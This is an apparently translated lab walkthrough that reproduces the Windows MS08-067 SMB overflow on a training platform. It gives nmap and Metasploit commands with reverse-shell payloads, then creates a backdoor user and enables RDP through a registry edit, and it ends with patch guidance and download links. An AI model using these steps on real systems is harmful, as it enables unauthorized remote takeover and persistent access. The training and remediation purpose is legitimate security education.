Foreword
Hello everyone, in this chapter I will reproduce the MS08-067 vulnerability, which was once very awesome, and all the experts are welcome to join me.
Overview of MS08-067
The full name of the MS08-067 vulnerability is “Windows Server Service RPC Request Buffer Overflow Vulnerability”. The attacker uses the SMB service port 445, which is open by default on the victim host, to send a special RPC (Remote Procedure Call) request, causing Stack buffer memory error, which can be exploited to implement remote code execution.
Principles
The MS08-067 vulnerability is triggered when the NEtPathCanonicalize function in the Server program is called through the MSRPC over SMB channel. When the NetPathCanonicalize function remotely accesses other hosts, it calls the NetpwPathCanonicalize function to normalize the remote access path. However, a stack buffer memory error (overflow) occurred in the NetpwPathCanonicalize function, which can be exploited to implement Remote Code Execution. ).
This vulnerability allows remote code execution when a user receives an RPC request on an affected system, allowing an attacker to run arbitrary code without authentication. At the same time, this vulnerability can be used for worm attacks.
Recurrence Platform
==================
Zhongke Panyun P9
==================
Network topology
Task environment description:
Server scenario: p9_kali-7 (username: root; password: toor)
Server scenario operating system: Kali Linux 192.168.1.102
==============================================
Server scenario: p9_xp-6 (username: admin; password: 123456)
Server scenario operating system: Microsoft Windows XP 192.168.1.106
Open the network topology, click the startup option, and start the experimental virtual machine
Reproduction process
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Information collection stage
Know the IP address of the target server, confirm its survival status, and conduct a preliminary scan on it first:
Use the nmap scanning tool to scan the server, focusing on verifying whether the MS08-067 vulnerability exists on the target server:
Call the MS08-067 script in nmap's common vulnerability scanning scripts to scan and verify it. nmap -O -n -T4 -p445 --script=vuln ms08-067 192.168.1.106
The areas marked in white are key verification points. It is initially confirmed that the existence of the target server is more likely, and further verification is now carried out.
Start the MSF penetration testing framework
msfconsole
Call related modules: exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi or search ms08-067 use 0
View necessary parameters
show options
Seeing that the target address must be set, I set it up:
set rhosts 192.168.1.106
Then the payload here loads the post-exploitation console shell by default. We have two options, one is to keep the default and enter the post-exploitation console by default, and the other is to directly enter the shell of the target server system. We first call the shell that directly enters the target server system, and put the two payload utilization commands below. You can use them as needed:
set payload windows/shell/reverse_tcp ##Directly enter the target server system shell set payload windows/meterpreter/reverse_tcp ##Enter the penetration console shell
You can press the tab key several times when setting various parameters to display all the settable parameters of the module:
example:
Here I am calling the windows/shell/reverse_tcp payload:
If the listening address is not set, you can set it additionally:
set lhost 192.168.1.102
Use the show targets command to display the target types (operating system, software version, etc.) supported by the vulnerability overflow module exploit.
Optional target 0 (automatic) or choose yourself:
show targets
In this experiment, we set the target operating system number to 34
We call it:
set target 34
Use the command check to detect whether the target machine has this vulnerability:
check
Attack Phase
Use the command exploit to execute the overflow attack module and successfully enter the target server shell.
exploit
After entering, check the opening status of the target server port:
netstat -an
Post-infiltration stage
Now create a backdoor user and try to log in to the desktop of the target system:
Traditional method of lesson plan:
I won’t go into details here and directly display the process:
The backdoor user is created, now open port 3389:
Use the command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f to open port 3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Successfully entered the target server desktop
My personal penetration ideas:
The previous idea remains unchanged, change the attack load to the windows/meterpreter/reverse_tcp module
set payload windows/meterpreter/reverse_tcp
Attack after verification as usual:
The attack is successful, entering the post-penetration stage and creating a backdoor user.
Call the enable_rdp module to open the 3389 remote desktop port and service and connect to the remote desktop:
run post/windows/manage/enable_rdp
Success, connect to target server remote desktop:
rdesktop 192.168.1.106
Entered successfully.
Reinforcement suggestions
The first is system update
Most customers have Automatic Updates enabled and do not need to take any action as this security update will be downloaded and installed automatically. Customers who have not enabled Automatic Updates must check for updates and install this update manually. For information about specific configuration options in automatic updates, for administrators, enterprise installations, or end users who want to manually install this security update, Microsoft recommends that customers use update management software to apply this update immediately or leverage the Microsoft Update service to check for updates.
Among the affected software, find your operating system and click on it to download the corresponding patch installation package. The format is. The system version used in this experiment is Windwos XP SP3.
Security Update for Windows Vista for x64-based Systems (KB958644)
Click this link to jump
http:// http://download.microsoft.com/download/1/5/0/15089485-0e8b-41f9-8617 -58e8cdda8c7e/Windows6.0-KB958644-x64.msu
Here are the download links for patch packages for other system versions:
================================================== =======================
Security Update for Windows Vista (KB958644)
?http://download.microsoft.com/download/d/c/0/dc047ab9-53f8-481c-8c46-528b7f493fc1/Windows6.0-KB958644-x86.msu
Security Update for Windows Server 2008 x64 Edition (KB958644)
?http://download.microsoft.com/download/0/f/4/0f425c69-4a1f-4654-b4f8-476a5b1bae1d/Windows6.0-KB958644-x64.msu
Security Update for Windows Server 2003 x64 Edition (KB958644)
?http://download.microsoft.com/download/9/8/e/98eff1c8-f2e2-43a4-abf7-7fb0315a09f7/WindowsServer2003.WindowsXP-KB958644-x64-CHS.exe
Security Update for Windows Server 2003 (KB958644)
?http://download.microsoft.com/download/8/4/4/84403755-aa0a-41ba-bded-7cbbc8dc218c/WindowsServer2003-KB958644-x86-CHS.exe
Security Update for Windows Server 2008 (KB958644)
?http://download.microsoft.com/download/4/9/8/498e39f6-9f49-4ca5-99dd-761456da0012/Windows6.0-KB958644-x86.msu
Windows 2000 Security Update (KB958644)
?http://download.microsoft.com/download/4/9/7/49751d3a-e93b-48fb-95de-2a229e602004/Windows2000-KB958644-x86-CHS.EXE
Security Update for Windows Vista for x64-based Systems (KB958644)
?http://download.microsoft.com/download/1/5/0/15089485-0e8b-41f9-8617-58e8cdda8c7e/Windows6.0-KB958644-x64.msu
Security Update for Windows XP (KB958644)
?http://download.microsoft.com/download/a/5/f/a5fcaabe-ff81-4d4f-972e-865bdc60dcbf/WindowsXP-KB958644-x86-CHS.exe
English operating system KB958644 patch download address:
Security Update for Windows 2000 (KB958644)
?http://download.microsoft.com/download/4/a/3/4a36c1ea-7555-4a88-98ac-b0909cc83c18/Windows2000-KB958644-x86-ENU.EXE
Security Update for Windows Server 2003 x64 Edition (KB958644)
?http://download.microsoft.com/download/f/7/6/f761e8ee-caad-4528-aa47-ed5d744be523/WindowsServer2003.WindowsXP-KB958644-x64-ENU.exe
Security Update for Windows 7 Pre-Beta for Itanium-based Systems (KB958644)
?http://download.microsoft.com/download/f/6/3/f639c726-86bb-4f3a-a783-5e03fc665af4/Windows6.1-KB958644-ia64.msu
Security Update for Windows XP x64 Edition (KB958644)
?http://download.microsoft.com/download/5/8/1/5811b6cc-5884-4486-b05d-de69f0e94f67/WindowsServer2003.WindowsXP-KB958644-x64-ENU.exe
Security Update for Windows Vista (KB958644)
?http://download.microsoft.com/download/d/c/0/dc047ab9-53f8-481c-8c46-528b7f493fc1/Windows6.0-KB958644-x86.msu
Security Update for Windows Server 2003 for Itanium-based Systems (KB958644)
?http://download.microsoft.com/download/1/8/e/18efd717-b406-4a19-98d5-5ee80351bedf/WindowsServer2003-KB958644-ia64-ENU.exe
Security Update for Windows 7 Pre-Beta (KB958644)
?http://download.microsoft.com/download/c/0/7/c07fca67-b0e2-4c9c-9c1f-9cde37131747/Windows6.1-KB958644-x86.msu
Security Update for Windows Server 2008 x64 Edition (KB958644)
?http://download.microsoft.com/download/0/f/4/0f425c69-4a1f-4654-b4f8-476a5b1bae1d/Windows6.0-KB958644-x64.msu
Security Update for Windows 7 Pre-Beta x64 Edition (KB958644)
?http://download.microsoft.com/download/d/4/6/d467b363-8825-4fa9-87fb-7cb4a9cedb56/Windows6.1-KB958644-x64.msu
Security Update for Windows XP (KB958644)
?http://download.microsoft.com/download/4/f/a/4fabe08e-5358-418b-81dd-d5038730b324/WindowsXP-KB958644-x86-ENU.exe
Security Update for Windows Server 2008 for Itanium-based Systems (KB958644)
?http://download.microsoft.com/download/8/b/c/8bc5a4e6-ba02-4bb9-947f-f253caeaa271/Windows6.0-KB958644-ia64.msu
Security Update for Windows Server 2003 (KB958644)
?http://download.microsoft.com/download/e/e/3/ee322649-7f38-4553-a26b-a2ac40a0b205/WindowsServer2003-KB958644-x86-ENU.exe
Security Update for Windows Server 2008 (KB958644)
?http://download.microsoft.com/download/4/9/8/498e39f6-9f49-4ca5-99dd-761456da0012/Windows6.0-KB958644-x86.msu
Security Update for Windows Vista for x64-based Systems (KB958644)
?http://download.microsoft.com/download/1/5/0/15089485-0e8b-41f9-8617-58e8cdda8c7e/Windows6.0-KB958644-x64.msu
================================================== =======================
Select the language of your system, click Download to download, and then install this patch package on the target system.
Click WindowsXP-KB958644-x86-CHS.exe to install the patch. After the installation is completed and restarted, use the MSF module again to verify that the target drone cannot be exploited.
End of chapter
This time, the operation of MS08-067 is reproduced. There are two sets of ideas. The traditional idea is suitable for the old version of Kali and the default operation. It is possible to open 3389 by modifying the registry. My personal idea is to use the module to open 3389 with one click. , the two sets of ideas each have their own advantages. You can learn from them as appropriate, and you are also welcome to leave messages for improvement.
The knowledge points of the article match the official knowledge files, and you can further learn related knowledge. Network Skill TreeHomepageOverview 41,650 people are learning the system